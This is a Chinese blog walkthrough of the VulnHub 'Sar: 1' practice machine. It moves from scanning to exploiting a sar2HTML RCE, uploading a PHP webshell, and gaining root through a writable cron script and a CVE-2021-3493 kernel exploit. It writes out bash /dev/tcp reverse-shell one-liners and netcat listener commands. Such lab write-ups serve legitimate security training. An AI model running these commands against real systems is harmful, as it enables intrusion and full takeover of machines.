【打靶练习】vulnhub Sar: 1

已于 2023-06-16 14:39:50 修改
阅读量152 收藏
点赞数
分类专栏: OSCP打靶练习 文章标签: php 系统安全 网络安全
于 2023-06-13 14:42:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35208730/article/details/131181566
版权

端口扫描

nmap -p- 172.16.33.13

在这里插入图片描述
惯例扫一下端口服务

nmap -p80 -sV 172.16.33.13

在这里插入图片描述

web指纹识别&目录扫描

直接访问80端口
在这里插入图片描述
收集到的信息:系统Ubuntu、软件apache、默认web路径/var/www/html/index.html

目录扫描

dirsearch -u http://172.16.33.13

在这里插入图片描述
通过phpinfo可以知道目标网站语言是php,并可以获取到大量系统信息
通过robots.txt发现隐藏路径sar2HTML

在这里插入图片描述
在这里插入图片描述
到这里发现网站指纹信息:sar2HTML 3.2.1
同时,发现存在文件上传功能,但是不知道上传路径无法直接利用
在这里插入图片描述

漏洞搜索

先搜一下是否有网站相关的漏洞

searchsploit sar2html

在这里插入图片描述

searchsploit -m 49344

漏洞利用

python 49344.py

在这里插入图片描述
收集信息:系统账户www-data、网站目录结构
经过搜索,发现文件上传路径为/var/www/html/
在这里插入图片描述
方式反弹shell均失败,猜测在这个环境下很多命令无法执行,可以利用文件上传上传一个webshell,或者上传一个php的反弹shell脚本,然后触发执行

上传php webshell

在这个网站生成webshell代码:https://www.revshells.com/在这里插入图片描述

上传反弹shell脚本
在这里插入图片描述
访问index1.php触发命令执行
在这里插入图片描述

反弹shell

kali监听4444端口

nc -nvlp 4444

在这里插入图片描述

webshell命令执行php反弹shell

/bin/bash -i >& /dev/tcp/10.8.0.69/4444 0>&1

先进行url编码然后通过webshell执行
在这里插入图片描述
在这里插入图片描述

提权1

目前得到的shell还不是完整的shell,先通过python升级shell
经过尝试通过python3升级shell失败
再尝试通过这个shell再反弹一个shell

/bin/bash -i >& /dev/tcp/10.8.0.69/4445 0>&1

在这里插入图片描述

在这里插入图片描述

尝试suid提权,失败
在这里插入图片描述
尝试定时任务提权
在这里插入图片描述
在这里插入图片描述
发现定时任务中,root用户通过finally.sh执行了write.sh,而write.sh当前用户可写

尝试上传一个新的write.sh替换当前文件
在这里插入图片描述

在这里插入图片描述
kali监听4446端口,等待反弹shell连接
在这里插入图片描述

提权2

利用Ubuntu内核漏洞提权(CVE-2021-3493)
在这里插入图片描述

目标靶机环境没有gcc编译工具,所以直接将编译好的exp下载到目标靶机中运行
在这里插入图片描述

在这里插入图片描述

分等级考试的佛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sar1靶机练习
SYJ_361的博客
04-01 4833
本文通过kali渗透sar1靶机获得root权限,利用kali找到对应的模块,查看漏洞信息,构造payload下载文件,用蚁剑反弹shell,最终获得root权限
sar:搜索和替换命令行工具-开源
05-13
此命令行工具可用于搜索和替换文件中的文本。
vulnhub Sar: 1
箭雨镜屋
05-04 1208
渗透思路:nmap扫描----dirb扫描网站目录----exploit-db查找exp----利用sar2html的RCE漏洞getshell(base64编码)----利用定时任务提权
vulnhub 靶机渗透:SAR: 1
Mysmycbx的博客
05-16 273
发现了robots.txt,打开发现sar2HTML,打开http://192.168.54.13/sar2HTML,发现是个工具,且告诉了版本号。可以root权限执行write.sh,但可以修改write.sh,那就修改为反弹shell。,既然是工具就可能存在漏洞,去searchsploit搜一下。发现执行成功了,那就说明该漏洞是存在的。然后静静地等待5分钟,就获取了root权限的反弹shell。发现有个root权限执行的定时任务,且5分钟执行一次。发现了2个且版本都是对应的,试试。
vulnhub:Sar
cjstang的博客
06-16 756
OSCP-2:这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。 主要利用方式:sar2HTML命令执行反弹shell(可php文件上传反弹shell)+定时脚本提权......
[VulnHub靶机渗透] Sar: 1
人若无名,便可专心练剑
02-07 953
靶机精讲 之 SARvulnhub靶机,盲打这台机器吧,老手测试一下宝刀,新手验证一下成长!标准的攻击链,却也需要你的腾挪躲闪。sar2html利用获得立足点,自动任务提权,很简单,但也未必打得很顺利,实战就是这样,大处的利用你要会,小的知识点、技能点也不能含糊。小试牛刀一下,you can do it!
vulnhub sar 靶场练习
鸥鹭忘机
09-07 2056
前言 这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。如果看过我前面vulnhub DC系列的文章,那么这次靶机可以独立自主完成。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击sar靶机,然后选中配置。依次点击网络配置->NAT模式->高
-bash: sar: 未找到命令
bang152101的博客
04-24 3430
直接安装sysstat即可:yum -y install sysstat [root@bogon ~]# sar -n DEV 1 2 | grep 'enp2s0f1' | grep -v grep -bash: sar: 未找到命令 [root@bogon ~]# yum install sar 已加载插件:fastestmirror Loading mirror speeds from c...
【ARM微型电脑/IoT设备/嵌入式】树莓派安装失败sysstat,成功后还是无法使用sar,并报错:-bash:sar:command not found
点赞的都能无bug通过!
11-15 1343
这主要是由于不完全安装导致的。解决方式是删除或编辑安装信息文件。删除所有信息之后update执行完以上代码后再用安装。
Vulnhub-靶机-Sar 1
qq_43264813的博客
01-27 1153
Vulnhub—靶机—Sar 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/sar-1,425/ 文章目录Vulnhub—靶机—Sar 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -s
SAR ADC系列1:静态指标
qq_41545745的博客
03-27 3584
简单的介绍了ADC的静态指标(失调、增益误差,单调性,积分非线性、微分非线性)(Offset、Gain Error、Monotonicity、DNL、INL ),并且介绍了DNL&INL测试理论方法
SAR ADC PCB布局布线:参考路径
01-19
在设计高性能数据采集系统时,勤奋的工程师仔细选择高精度模数转换器(ADC)以及模拟前端调节电路所需的其他元件。在几个星期的设计工作之后,执行模拟并优化电路原理图,为了赶工期,设计人员迅速地将电路板布局布线...
matlab三维图像代码-sar:SAR成像的自动聚焦和图像处理算法
05-20
该存储库包含用于SAR图像处理和自动聚焦算法的所有源代码。 有关详细信息,请参阅每个子目录的README 。 data_collection 所有用于实时收集雷达数据的程序。 2d_autofocus 与3d_autofocus类似,但仅适用于二维光圈。...
计算抛物线SAR:计算抛物线SARSAR-停止和反向)-matlab开发
05-30
输出: SAR - 抛物线 SAR 的输出向量turnPoints - SAR 向量中的转弯位置longSort - 长=1,排序=-1 例子: % 读取 JNJ 股票数据url2Read = ' ...
SAR图像处理1
05-12
SAR图像处理1 SAR 课件 SAR学习入门的教材
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 270
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 832
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
无回显XXE攻击:隐秘的数据泄露技术
最新发布
weixin_43822401的博客
06-14 371
无回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
软考初级网络管理员_07_网络单选题
2301_80961833的博客
06-12 909
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述中错误的是()。
vulnhub sar
09-09
vulnhub sar是一个类似OSCP的虚拟机,它旨在帮助用户提高和巩固渗透测试的知识点。如果你想下载sar靶机,你可以在GitHub上找到它,具体来说,你可以在pentestmonkey的php-reverse-shell存储库中找到它。如果你已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值